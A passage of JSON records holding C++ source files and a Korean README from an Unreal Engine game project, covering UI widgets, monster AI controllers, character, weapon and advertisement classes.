\n\t\tpStagePlayData->NumberOfMonstersMuiltiKill);\n}\n\nvoid UPG_UserWidgetPlayStage::OnUpdateTime()\n{\n\tABCHECK(nullptr != WB_StageClearTarget);\n\n\tauto pGameStateStage = Cast<APG_GameStateStage>(GetWorld()->GetGameState());\n\tABCHECK(nullptr != pGameStateStage);\n\n\tauto pGameModeStage = Cast<APG_GameModeStage>(GetWorld()->GetAuthGameMode());\n\tABCHECK(nullptr != pGameModeStage);\n\n\tconst FPGStagePlayData* pStagePlayData = pGameStateStage->GetStagePlayData();\n\tABCHECK(nullptr != pStagePlayData);\n\n\tWB_StageClearTarget->SetDataTime(pGameModeStage->IsClearMission(EStageClearType::eSCT_ClearTime),\n\t\tpStagePlayData->RemainTime);\n}\n\nUPG_UserWidgetWeaponBox* UPG_UserWidgetPlayStage::GetUserWidgetWeaponBox(int32 nSlotIndex)\n{\n\tUPG_UserWidgetWeaponBox* pWeaponBox = nullptr;\n\tif (0 == nSlotIndex)\n\t\tpWeaponBox = WB_WeaponBox_0;\n\telse if (1 == nSlotIndex)\n\t\tpWeaponBox = WB_WeaponBox_1;\n\telse if (2 == nSlotIndex)\n\t\tpWeaponBox = WB_WeaponBox_2;\n\n\treturn pWeaponBox;\n}\n\nUOverlay* UPG_UserWidgetPlayStage::GetOverlaySelectWeapon(int32 nSlotIndex)\n{\n\tUOverlay* pOverlaySelectWeapon = nullptr;\n\tif (0 == nSlotIndex)\n\t\tpOverlaySelectWeapon = SelectWeapon_0;\n\telse if (1 == nSlotIndex)\n\t\tpOverlaySelectWeapon = SelectWeapon_1;\n\telse if (2 == nSlotIndex)\n\t\tpOverlaySelectWeapon = SelectWeapon_2;\n\n\treturn pOverlaySelectWeapon;\n}\n\n" }, { "alpha_fraction": 0.7510548233985901, "alphanum_fraction": 0.7510548233985901, "avg_line_length": 25.33333396911621, "blob_id": "d5c9cadceda4ed13f3fbad27bae270d1b828d30c", "content_id": "48eedd875e40e54fed8f3a32d36c61768075c737", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1898, "license_type": "no_license", "max_line_length": 113, "num_lines": 72, "path": "/Source/Project_Gun/Private/AI/PG_AICon_Mon.cpp", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#include \"AI/PG_AICon_Mon.h\"\n#include \"Character/PG_MonChar.h\"\n\n#include <BehaviorTree/BehaviorTree.h>\n#include <BehaviorTree/BlackboardData.h>\n#include <BehaviorTree/BlackboardComponent.h>\n\nconst FName APG_AICon_Mon::HomePosKey(TEXT(\"HomePos\"));\nconst FName APG_AICon_Mon::TargetKey(TEXT(\"Target\"));\nconst FName APG_AICon_Mon::DetectRangeKey(TEXT(\"MDetectRange\"));\nconst FName APG_AICon_Mon::ChaseRangeKey(TEXT(\"MChaseRange\"));\n\nAPG_AICon_Mon::APG_AICon_Mon()\n{\n\tstatic ConstructorHelpers::FObjectFinder<UBlackboardData> BBObject(TEXT(\"/Game/PG/AI/BB_Mon.BB_Mon\"));\n\tif (BBObject.Succeeded())\n\t{\n\t\tBBAsset = BBObject.Object;\n\t}\n\n\tstatic ConstructorHelpers::FObjectFinder<UBehaviorTree> BTObject(TEXT(\"/Game/PG/AI/BT_MonNormal.BT_MonNormal\"));\n\tif (BTObject.Succeeded())\n\t{\n\t\tBTAsset = BTObject.Object;\n\t}\n}\n\nvoid APG_AICon_Mon::OnPossess(APawn* InPawn)\n{\n\tSuper::OnPossess(InPawn);\n}\n\nbool APG_AICon_Mon::RunAI()\n{\n\tABCHECK(UseBlackboard(BBAsset, Blackboard), false);\n\tABCHECK(SetBlackboardValue(), false);\n\n\tif (!RunBehaviorTree(BTAsset))\n\t{\n\t\tABLOG(Error, TEXT(\"AIController couldn't run behavior tree!\"));\n\t\treturn false;\n\t}\n\n\treturn true;\n}\n\nvoid APG_AICon_Mon::StopAI()\n{\n\tauto BehaviorTreeComponent = Cast<UBehaviorTreeComponent>(BrainComponent);\n\tif (nullptr != BehaviorTreeComponent)\n\t{\n\t\tBehaviorTreeComponent->StopTree(EBTStopMode::Safe);\n\t\t//StopMovement();\n\t}\n}\n\nbool APG_AICon_Mon::SetBlackboardValue()\n{\n\tABCHECK(nullptr != Blackboard, false);\n\n\tauto MonsterCharacter = Cast<APG_MonChar>(GetPawn());\n\tif (nullptr == MonsterCharacter)\n\t\treturn false;\n\n\tBlackboard->SetValueAsVector(HomePosKey, GetPawn()->GetActorLocation());\n\tBlackboard->SetValueAsInt(DetectRangeKey, MonsterCharacter->GetDetectRange());\n\tBlackboard->SetValueAsInt(ChaseRangeKey, MonsterCharacter->GetChaseRange());\n\n\treturn true;\n}\n" }, { "alpha_fraction": 0.7102803587913513, "alphanum_fraction": 0.7102803587913513, "avg_line_length": 14.285714149475098, "blob_id": "ab949917783a8110cce0007a7e73972203dd467c", "content_id": "45200bea196b10b7021bb39f908bda1e39ef8b02", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 323, "license_type": "no_license", "max_line_length": 79, "num_lines": 21, "path": "/Source/Project_Gun/Public/Anim/PG_AnimIns_Mon.h", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#pragma once\n\n#include \"Project_Gun/Project_Gun.h\"\n\n#include <Animation/AnimInstance.h>\n#include \"PG_AnimIns_Mon.generated.h\"\n\n/**\n * \n */\nUCLASS()\nclass PROJECT_GUN_API UPG_AnimIns_Mon : public UAnimInstance\n{\n\tGENERATED_BODY()\n\t\n\t\n\t\n\t\n};\n" }, { "alpha_fraction": 0.7647058963775635, "alphanum_fraction": 0.7766884565353394, "avg_line_length": 18.95652198791504, "blob_id": "e0f93b0fded5567bca3a5241752c83ef8d7e8dc4", "content_id": "85c46e3845a663216fab17861c58aa934dc5d764", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 920, "license_type": "no_license", "max_line_length": 117, "num_lines": 46, "path": "/Source/Project_Gun/Public/UI/PG_UserWidgetWeaponInventory.h", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#pragma once\n\n#include \"Project_Gun/Project_Gun.h\"\n\n#include <Blueprint/UserWidget.h>\n#include \"PG_UserWidgetWeaponInventory.generated.h\"\n\nDECLARE_MULTICAST_DELEGATE_TwoParams(FOnBtnClickedClose, int32, int32);\t// FOnBtnClickedClose, SlotIndex, WeaponIndex\n/**\n * \n */\nUCLASS()\nclass PROJECT_GUN_API UPG_UserWidgetWeaponInventory : public UUserWidget\n{\n\tGENERATED_BODY()\n\t\n\tenum\n\t{\n\t\teMaxInvenIndex = 6,\n\t};\n\t\nprotected:\n\tvirtual void NativeConstruct() override;\n\npublic :\n\tUFUNCTION(BlueprintCallable)\n\tvoid UpdateWeaponInventory();\n\n\tUFUNCTION(BlueprintCallable)\n\tvoid SetOpenSlotIndex(int32 nSlotIndex);\n\nprotected :\n\tUFUNCTION()\n\tvoid OnSelectWeaponIndex(int32 nWeaponIndex);\n\n\tUFUNCTION(BlueprintCallable)\n\tvoid OnBtnClose();\n\npublic :\n\tFOnBtnClickedClose OnBtnClickedClose;\n\nprivate:\n\tint32 m_nOpenSlotIndex = PG_INVALID_INDEX;\n};\n" }, { "alpha_fraction": 0.7820823192596436, "alphanum_fraction": 0.7820823192596436, "avg_line_length": 24.030303955078125, "blob_id": "c165a4c682b1835126099e7ca071df9545aaa207", "content_id": "d750fa196cde991ef9b4d52ab909cb56fd0f8e9b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 828, "license_type": "no_license", "max_line_length": 89, "num_lines": 33, "path": "/Source/Project_Gun/Public/Character/PG_MonCharDivisionSkillType.h", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#pragma once\n\n#include \"Project_Gun/Project_Gun.h\"\n#include \"Character/PG_MonChar.h\"\n\n#include \"PG_MonCharDivisionSkillType.generated.h\"\n\n/**\n * \n */\nUCLASS()\nclass PROJECT_GUN_API APG_MonCharDivisionSkillType : public APG_MonChar\n{\n\tGENERATED_BODY()\n\t\npublic :\n\tAPG_MonCharDivisionSkillType();\n\nprotected:\n\t// Called when the game starts or when spawned\n\tvirtual void BeginPlay() override;\n\tvirtual void PostInitializeComponents() override;\n\nprotected:\n\tUPROPERTY(VisibleInstanceOnly, Category = \"PG MonsterComponent\")\n\tclass UPG_ComponentDivisionSpawn* CharDivisionComponent;\n\n\tUPROPERTY(EditAnywhere, Category = \"PG MonsterInfo\", Meta = (AllowPrivateAccess = true))\n\tstruct FPGMonsterData_DivisionSkillType MonsterDivisionSkillTypeData;\n\t\n};\n" }, { "alpha_fraction": 0.6226749420166016, "alphanum_fraction": 0.6238559484481812, "avg_line_length": 32.869998931884766, "blob_id": "9098508b4fb71dd13dd628e8427a2149e6d4d3ae", "content_id": "0aaa36fbe25ee892221465b9fb8ebbf76ff18ca7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3665, "license_type": "no_license", "max_line_length": 165, "num_lines": 100, "path": "/Source/Project_Gun/Public/Character/PG_MonCharSkillType.h", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#pragma once\n\n#include \"Project_Gun/Project_Gun.h\"\n#include \"Character/PG_MonChar.h\"\n\n#include \"PG_MonCharSkillType.generated.h\"\n\n/**\n *\n */\nUCLASS()\nclass PROJECT_GUN_API APG_MonCharSkillType : public APG_MonChar\n{\n\tGENERATED_BODY()\n\npublic:\n\tAPG_MonCharSkillType();\n\n\tvirtual void Tick(float DeltaTime) override;\n\nprotected :\n\tvirtual void BeginPlay() override;\n\tvirtual void PostInitializeComponents() override;\n\tvirtual void Destroyed() override;\n\tvirtual void OnHitCallback(UPrimitiveComponent* HitComp, AActor* OtherActor, UPrimitiveComponent* OtherComp, FVector NormalImpulse, const FHitResult& Hit) override;\n\npublic :\n\t//=============================================\n\t// Weapon\n\t//=============================================\n\tvoid\tFireWeapon();\n\n\t//=============================================\n\t// Dash\n\t//=============================================\n\tvoid\tDash(FVector vTarget);\n\tfloat\tGetDashDistaceScale();\n\n\t//=============================================\n\t// Division\n\t//=============================================\n\tvoid\tSetMonsterDataDivision(FPGMonsterData_SkillType& MonsterData_SkillType);\n\tbool\tIsPossibleToDivision();\t\t\t\t// 분할 가능한지 검사\n\tint32\tGetDivisionCountToHPRatio();\t\t// 현재 몬스터의 남은 체력 기준, 분할 할 수 있는 횟수를 반환한다.\n\nprotected :\n\tvoid UpdateWeaponSystem();\n\tvoid UpdateDashSystem();\n\n\tbool FindTargetToMyCharForWeapon();\n\tbool FindTargetToMyCharForDash(OUT FVector& vGetTargetPos);\n\nprotected:\n\tvirtual bool OnDamage(int32 nDamage, bool IsUseLetharAttack = false) override;\n\tvoid OnEndWeaponFireCoolTime();\t// 무기 발사 쿨타임 종료\n\tvoid OnStartDash();\t\t\t\t// 대쉬 시작\n\tUFUNCTION()\n\tvoid OnEndDash();\t\t\t\t// 대쉬 종료\n\tvoid OnEndDashCoolTime();\t\t// 대쉬 쿨타임 종료\n\npublic :\n\t// 스폰되면 생성된 몬스터 액터가 호출된다.\n\tvoid OnSpawnActor(APG_MonCharSkillType* ASpawnActor);\n\nprivate:\n\tUPROPERTY(EditAnywhere, BlueprintReadWrite, Category = \"PG MonsterInfo\", Meta = (AllowPrivateAccess = true))\n\tstruct FPGMonsterData_SkillType MonsterSkillTypeData;\n\n\t//=============================================\n\t// Weapon\n\t//=============================================\n\tUPROPERTY(VisibleAnywhere, Category = \"PG Weapon MonsterComponent\", Meta = (AllowPrivateAccess = true))\n\tclass UPG_ComponentWeapon* WeaponComponent;\n\tbool\t\t\tm_bEquipWeapon = false;\t\t\t// 무기 사용 가능여부\n\tbool\t\t\tm_bCanWeaponFire = false;\t\t// 무기 발사 사용여부\n\tFTimerHandle\tHandleWeaponCoolTime;\t\t\t// 무기 발사 쿨타임\n\n\t//=============================================\n\t// Dash\n\t//=============================================\n\tUPROPERTY(VisibleAnywhere, Category = \"PG Dash MonsterComponent\", Meta = (AllowPrivateAccess = true))\n\tclass UPG_ComponentDash* DashComponent;\n\tUPROPERTY(EditAnywhere, Category = \"PG Dash MonsterComponent\", Meta = (AllowPrivateAccess = true))\n\tclass UStaticMeshComponent* PreviewMeshComponent;\n\tbool\t\t\tm_bOnHitBlocking = false;\t\t// 대쉬 중 장애물에 부딪힘\n\tbool\t\t\tm_bEquipDash = false;\t\t\t// 대쉬 사용 가능여부\n\tbool\t\t\tm_bCanDash = false;\t\t\t\t// 대쉬 활성화 여부\n\tFTimerHandle\tHandleDashDelayTime;\t\t\t// 대쉬 딜레이 타임\n\tFTimerHandle\tHandleDashTime;\t\t\t\t\t// 대쉬 시간\n\tFTimerHandle\tHandleDashCoolTime;\t\t\t\t// 대쉬 쿨타임\n\n\n\t//=============================================\n\t// Division\n\t//=============================================\n\tUPROPERTY(VisibleAnywhere, Category = \"PG Division MonsterComponent\", Meta = (AllowPrivateAccess = true))\n\tclass UPG_ComponentDivisionSpawn* DivisionSpawnComponent;\n};\n" }, { "alpha_fraction": 0.6509186625480652, "alphanum_fraction": 0.6614173054695129, "avg_line_length": 25.581396102905273, "blob_id": "aa0b901697549451c56979b5b3fa175d28d8b107", "content_id": "6e6eb7c840f7fc4b51ffd0c33f847b21b3a3b117", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2506, "license_type": "no_license", "max_line_length": 94, "num_lines": 86, "path": "/Source/Project_Gun/Public/UI/PG_UserWidgetPlayStage.h", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#pragma once\n\n#include \"Project_Gun/Project_Gun.h\"\n\n#include <Blueprint/UserWidget.h>\n#include \"PG_UserWidgetPlayStage.generated.h\"\n\n/**\n * \n */\nUCLASS()\nclass PROJECT_GUN_API UPG_UserWidgetPlayStage : public UUserWidget\n{\n\tGENERATED_BODY()\n\t\n\tenum\n\t{\n\t\teMaxWeaponSlotIndex = PG_MAX_WEAPON_SLOT,\t// 최대 장착 가능한 무기의 수\n\t};\n\t\nprotected:\n\tvirtual void NativeConstruct() override;\n\t\npublic :\n\tvoid InitWeaponBoxData();\n\tbool InitWeaponBoxData(bool bEnable, int32 nSlotIndex, int32 nWeaponTableIndex, int32 nAmmo);\n\n\t// 화면에 현재 착용중인 무기를 표시한다.\n\tvoid SetSelectWeapon(int32 nSlotIndex);\n\npublic :\n\t//=====================================================\n\t// Reward Point\n\t//=====================================================\n\t// 포인트 획득 업데이트\n\tUFUNCTION(BlueprintImplementableEvent, Category = \"RewardPoint\")\n\tvoid OnChangeRewardPoint();\n\n\t//=====================================================\n\t// 스테이지 클리어 목표 현황\n\t//=====================================================\n\t// 현재 몬스터 킬수 업데이트\n\tUFUNCTION(BlueprintCallable)\n\tvoid OnUpdateFlag();\n\t// 몬스터 필살기 킬수 업데이트\n\tUFUNCTION(BlueprintCallable)\n\tvoid OnUpdateLethal();\n\t// 타이머 업데이트\n\tUFUNCTION(BlueprintCallable)\n\tvoid OnUpdateTime();\n\n\t//=====================================================\n\t// 무기 슬롯\n\t//=====================================================\n\tUFUNCTION(BlueprintCallable)\n\tvoid OnUpdateWeaponAmmo(int32 nSlotIndex, int32 nAmmo);\n\t// 해당 SlotIndex의 무기를 변경 요청하였다.\n\tUFUNCTION(BlueprintCallable)\n\tvoid OnChangeEquipWeaponIndex(int32 nSlotIndex);\n\nprivate :\n\tclass UPG_UserWidgetWeaponBox* GetUserWidgetWeaponBox(int32 nSlotIndex);\n\tclass UOverlay* GetOverlaySelectWeapon(int32 nSlotIndex);\n\nprotected:\n\t// 스테이지 클리어 목표 현황\n\tUPROPERTY(BlueprintReadWrite)\n\tclass UPG_UserWidgetStageClearTarget* WB_StageClearTarget;\n\n\t// 무기 슬롯\n\tUPROPERTY(BlueprintReadWrite)\n\tclass UPG_UserWidgetWeaponBox* WB_WeaponBox_0;\n\tUPROPERTY(BlueprintReadWrite)\n\tclass UPG_UserWidgetWeaponBox* WB_WeaponBox_1;\n\tUPROPERTY(BlueprintReadWrite)\n\tclass UPG_UserWidgetWeaponBox* WB_WeaponBox_2;\n\n\tUPROPERTY(BlueprintReadWrite)\n\tclass UOverlay* SelectWeapon_0;\n\tUPROPERTY(BlueprintReadWrite)\n\tclass UOverlay* SelectWeapon_1;\n\tUPROPERTY(BlueprintReadWrite)\n\tclass UOverlay* SelectWeapon_2;\n};\n" }, { "alpha_fraction": 0.7631257772445679, "alphanum_fraction": 0.7802197933197021, "avg_line_length": 21.135135650634766, "blob_id": "e0e6ead3587c69457d624d0b026cf64f44c96ea5", "content_id": "4b5d9c7469fbbc8a7eaa36eab704a536cbc6f36b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 821, "license_type": "no_license", "max_line_length": 79, "num_lines": 37, "path": "/Source/Project_Gun/Public/UI/PG_UserWidgetPlayStageWeaponBag.h", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#pragma once\n\n#include \"Project_Gun/Project_Gun.h\"\n#include \"Blueprint/UserWidget.h\"\n\n#include \"PG_UserWidgetPlayStageWeaponBag.generated.h\"\n\n/**\n * \n */\nUCLASS()\nclass PROJECT_GUN_API UPG_UserWidgetPlayStageWeaponBag : public UUserWidget\n{\n\tGENERATED_BODY()\n\n\tenum\n\t{\n\t\teMaxWeaponSlot = PG_MAX_WEAPON_SLOT,\n\t};\n\nprotected:\n\tvirtual void NativeConstruct() override;\n\npublic :\n\tbool SetSlotWaponIndex(int32 nSlotIndex, int32 nWeaponIndex);\n\tbool SetSlotWeaponAmmo(int32 nSlotIndex, int32 nAmmo);\n\tbool SetEnableSlot(int32 nSlotIndex, bool bEnable);\n\tvoid SetEnableLightBox(int32 nEnableSlotIndex);\n\nprotected:\n\tvoid OnBtnWeaponSlotClicked(int32 nSlotIndex);\n\nprotected:\n\tPG_WIDGET_DECLAR_TArray(UPG_UserWidgetWeaponBox, WB_WeaponSlot);\n};\n" }, { "alpha_fraction": 0.7358871102333069, "alphanum_fraction": 0.7399193644523621, "avg_line_length": 16.714284896850586, "blob_id": "c5dda789d1a1c6ce7913d5e753d54e3cce271911", "content_id": "3bd513dbf6c655095f218434c7bf6489b139d729", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 498, "license_type": "no_license", "max_line_length": 79, "num_lines": 28, "path": "/Source/Project_Gun/Public/Game/AD/PG_ADData.h", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#pragma once\n\n#include \"Project_Gun/Project_Gun.h\"\n\n/**\n * \n */\nclass PROJECT_GUN_API PG_ADData\n{\npublic:\n\tPG_ADData();\n\t~PG_ADData();\n\npublic :\n\tvoid Init(class UPG_GameInstance* pGameInstance);\n\tvoid Update(float DeltaTime);\n\n\tvoid\tReset(EADType ekADType);\n\tint32\tGetRemainReViewableTime(EADType ekADType);\n\n\tbool\tIsAbleViewAD(EADType ekADType);\n\nprivate :\n\tUPROPERTY()\n\tTArray<float> m_kRemainReViewableTime;\n};\n" }, { "alpha_fraction": 0.752525269985199, "alphanum_fraction": 0.7550504803657532, "avg_line_length": 19.842105865478516, "blob_id": "0f87206c96c80d1f7cc365b423f55032daef5da5", "content_id": "c463d3deab62c87cbc59fba57eb7f03d7c0a4bf7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 810, "license_type": "no_license", "max_line_length": 79, "num_lines": 38, "path": "/Source/Project_Gun/Public/BlueScriptObject/Weapon/PG_WeaponFlameGun.h", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#pragma once\n\n#include \"Project_Gun/Project_Gun.h\"\n#include \"BlueScriptObject/Weapon/PG_Weapon.h\"\n#include \"BlueScriptObject/Projectile/PG_ProjectileFlame.h\"\n\n#include \"PG_WeaponFlameGun.generated.h\"\n\n/**\n * \n */\nUCLASS()\nclass PROJECT_GUN_API APG_WeaponFlameGun : public APG_Weapon\n{\n\tGENERATED_BODY()\n\t\npublic:\n\tAPG_WeaponFlameGun();\n\n\tvirtual void PostInitializeComponents() override;\n\tvirtual void Tick(float DeltaTime) override;\n\tvirtual void Destroyed() override;\n\npublic :\n\tvirtual void Fire() override;\n\tvirtual void StopFire() override;\n\nprivate :\n\tvoid RemoveCurrFireFlame();\n\nprivate :\n\tUPROPERTY()\n\tclass APG_Projectile* CurrFireFlame;\t\t// 현재 화염 방사중인 Flame Projectile\n\n\tfloat FlameLength = 0.0f;\n};\n" }, { "alpha_fraction": 0.5857515335083008, "alphanum_fraction": 0.5885229706764221, "avg_line_length": 33.65536880493164, "blob_id": "2817bb5bd334def08410f2b57e55dea19cabda4e", "content_id": "878b63bff5b24f74ee30cb184ee6160c4e42d0fe", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 6286, "license_type": "no_license", "max_line_length": 195, "num_lines": 177, "path": "/Source/Project_Gun/Public/Character/PG_MyChar.h", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#pragma once\n\n#include \"Project_Gun/Project_Gun.h\"\n#include \"Character/PG_Char.h\"\n\n#include <GameFramework/Character.h>\n#include \"PG_MyChar.generated.h\"\n\nUCLASS()\nclass PROJECT_GUN_API APG_MyChar : public APG_Char\n{\n\tGENERATED_BODY()\n\npublic:\n\t// Sets default values for this character's properties\n\tAPG_MyChar();\n\nprotected:\n\t// Called when the game starts or when spawned\n\tvirtual void BeginPlay() override;\n\tvirtual void PostInitializeComponents() override;\n\tvirtual void OnConstruction(const FTransform& Transform) override;\n\tvirtual void FellOutOfWorld(const class UDamageType & dmgType) override;\n\npublic:\t\n\t// Called every frame\n\tvirtual void Tick(float DeltaTime) override;\n\t// Called to bind functionality to input\n\tvirtual void SetupPlayerInputComponent(class UInputComponent* PlayerInputComponent) override;\n\nprotected:\n\tvoid UpdateRotation(float DeltaTime);\n\tvoid UpdateCamera(float DeltaTime);\n\tvoid UpdateMovement(float DeltaTime);\n\npublic :\n\tUFUNCTION(BlueprintCallable, Category = \"PG TargetMonster\")\n\tbool IsTargetMonster();\t\t// 몬스터 타겟팅 여부\n\n\t//==========================================================\n\t// Character Stat\n\t//==========================================================\n\tfloat GetMaxSpeed();\t\t// 이동속도\n\tfloat GetAttackRange();\t\t// 공격범위\n\n\t//==========================================================\n\t// Weapon\n\t//==========================================================\n\tbool EquipWeapon(int32 nWeaponTalbeIndex);\t\t// 장비장착\n\tvoid Fire() override;\t\t\t\t\t\t\t// 무기발사\n\n\t//==========================================================\n\t// LethalAttack\n\t//==========================================================\n\tbool EquipLethalAttack(int32 LethalAttackID);\t// 스킬 장착\n\tbool UnEquipLethalAttack();\n\npublic :\n\tUFUNCTION()\n\tvirtual void OnGenerateOverlabEvent(UPrimitiveComponent* OverlappedComp, AActor* OtherActor, UPrimitiveComponent* OtherComp, int32 OtherBodyIndex, bool bFromWeep, const FHitResult& SweepResult);\n\tvoid OnAttackedByMonster();\t\t// 몬스터에게 피격당함\n\tvoid OnPlayerWorldOut();\t\t// 맵에서 떨어짐. (Kill Z)\n\tvoid OnDefaultAttackMonsterKill(class APG_MonChar* AMon);\t// 몬스터 사망\n\tvoid OnChangeWeapon(int32 nWeaponTableIndex);\n\nprivate :\n\t//==========================================================\n\t// Camera\n\t//==========================================================\n\tenum class ECameraView : int\n\t{\n\t\teCV_QuaterView = 0,\n\t\teCV_Fly,\n\t};\n\n\tvoid SetCameraView(ECameraView eCameraView);\n\n\t//==========================================================\n\t// Character Movement\n\t//==========================================================\n\tvoid UpDown(float NewAxisValue);\n\tvoid LeftRight(float NewAxisValue);\n\tvoid TouchReleased();\n\n\tvoid UpdateMovementData();\n\n\t//==========================================================\n\t// Weapon\n\t//==========================================================\n\tUFUNCTION()\n\tbool SetWeapon(APG_Weapon* NewWeapon);\n#ifdef TEST_CODE\n\tvoid WeaponEquipRlife();\n\tvoid WeaponEquipFlame();\n\tvoid WeaponEquipShutgun();\n\tvoid WeaponEquipLaserBeam();\n\tvoid WeaponEquipGrandleLauncher();\n#endif // TEST_CODE\n\n\t//==========================================================\n\t// LethalAttack\n\t//==========================================================\n\tUFUNCTION()\n\tbool SetLethalAttack(class APG_LethalAttack* NewLethalAttack);\n\n\tclass APG_MonChar* FindTargetToMonster();\n\nprivate :\n\t//==========================================================\n\t// Animation (애니메이션)\n\t//==========================================================\n\tUPROPERTY()\n\tclass UPG_AnimIns_MyChar* ABAnimInstance;\n\n\t//==========================================================\n\t// Camera\n\t//==========================================================\n\tUPROPERTY(VisibleAnywhere, Category = \"PG CameraInfo\")\n\tUSpringArmComponent* SpringArm;\n\tUPROPERTY(VisibleAnywhere, Category = \"PG CameraInfo\")\n\tUCameraComponent* Camera;\n\n\t// CharacterCameraTable (캐릭터 카메라 정보)\n\tfloat\t\tArmLengthTo = 0.0f;\n\tFRotator\tArmRotationTo = FRotator::ZeroRotator;\n\tfloat\t\tArmLengthSpeed = 0.0f;\n\tfloat\t\tArmRotationSpeed = 0.0f;\n\tECameraView m_eCurrentCameraView;\n\n\tUPROPERTY()\n\tclass APG_PlayerController*\tm_pPlayerContorller;\n\tUPROPERTY(Transient, EditAnywhere, Category = \"PG CharacterCameraTableInfo\")\n\tfloat\t\tPitch;\n\tUPROPERTY(Transient, EditAnywhere, Category = \"PG CharacterCameraTableInfo\")\n\tfloat\t\tYaw;\n\tUPROPERTY(Transient, EditAnywhere, Category = \"PG CharacterCameraTableInfo\")\n\tfloat\t\tRoll;\n\tUPROPERTY(Transient, EditAnywhere, Category = \"PG CharacterCameraTableInfo\")\n\tfloat\t\tArmLength;\n\tUPROPERTY(Transient, EditAnywhere, Category = \"PG CharacterCameraTableInfo\")\n\tfloat\t\tFov;\n\tUPROPERTY(Transient, EditAnywhere, Category = \"PG CharacterCameraTableInfo\")\n\tfloat\t\tScreenY;\n\n\t//==========================================================\n\t// CharacterMovementTable (캐릭터 이동관련 정보)\n\t//==========================================================\n\tFVector\t\tDirectionToMove = FVector::ZeroVector;\n\n\tUPROPERTY(Transient, EditAnywhere, Category = \"PG CharacterMovementTableInfo\")\n\tfloat\t\tMaxSpeed;\n\tUPROPERTY(Transient, EditAnywhere, Category = \"PG CharacterMovementTableInfo\")\n\tfloat\t\tAccelerationSpeed;\n\tUPROPERTY(Transient, EditAnywhere, Category = \"PG CharacterMovementTableInfo\")\n\tfloat\t\tBodyRotateSpeed;\n\tUPROPERTY(Transient, EditAnywhere, Category = \"PG CharacterMovementTableInfo\")\n\tfloat\t\tAttackBodyRotateSpeed;\n\tUPROPERTY(Transient, EditAnywhere, Category = \"PG CharacterMovementTableInfo\")\n\tfloat\t\tAttackUpperBodyRotateSpeed;\n\n\tfloat\t\tMonsterTargetAngle = 0.0f;\n\tFRotator\tTargetRotation = FRotator::ZeroRotator;\n\n\t//==========================================================\n\t// Weapon (무기)\n\t//==========================================================\n\tUPROPERTY(VisibleAnywhere, Category = \"PG WeaponInfo\")\n\tTWeakObjectPtr<class APG_Weapon> CurrentWeapon = nullptr;\n\n\t//==========================================================\n\t// LethalAttack (필살기)\n\t//==========================================================\n\tUPROPERTY(VisibleAnywhere, Category = \"PG LethalAttackInfo\")\n\tTWeakObjectPtr<class APG_LethalAttack> CurrentLethalAttack = nullptr;\n};\n" }, { "alpha_fraction": 0.6847545504570007, "alphanum_fraction": 0.7157622575759888, "avg_line_length": 15.125, "blob_id": "b63aab6c3063cc057fb311771c5069b801c75458", "content_id": "9b092233ccb5b08353efedd73a8e1e098dbfeaca", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 621, "license_type": "no_license", "max_line_length": 71, "num_lines": 24, "path": "/README.md", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "# ProjectGun-wkdtpeo\n언리얼 입문 및 습작용 프로젝트 관리용 (Source)\n\n소스코드는 Git으로 관리하며, 리소스는 SVN으로 관리하도록 프로젝트 구축하였습니다.\n\nUnreal Ver. 4.25.4\n\nSource(Git) : https://github.com/wkdtpeo/ProjectGun-wkdtpeo.git\n\nResouce(SVN) : http://wkdtpeo.iptime.org:1001/svn/Portfolio/ProjectGun/\n\n제작인원 : 3명\n\n프로그래밍 : 1명\n\n기획 : 1명\n\n모델러 : 1명\n\n\n\nSVN 서버는 개인 컴퓨터에 구축된 상태이므로 항상 서버가 열려있진 않습니다.\n\n필요시 연락을 주시면 서버를 열도록 하겠습니다. ([email protected])\n" }, { "alpha_fraction": 0.7594837546348572, "alphanum_fraction": 0.7712162733078003, "avg_line_length": 24.316831588745117, "blob_id": "c967fc78582de4aa55c7f73a3773b81420aa7c0f", "content_id": "6f649a71c7cb5048a4af781453394cae5a4c3237", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2605, "license_type": "no_license", "max_line_length": 99, "num_lines": 101, "path": "/Source/Project_Gun/Public/UI/PG_UserWidgetShopWeaponSlot.h", "repo_name": 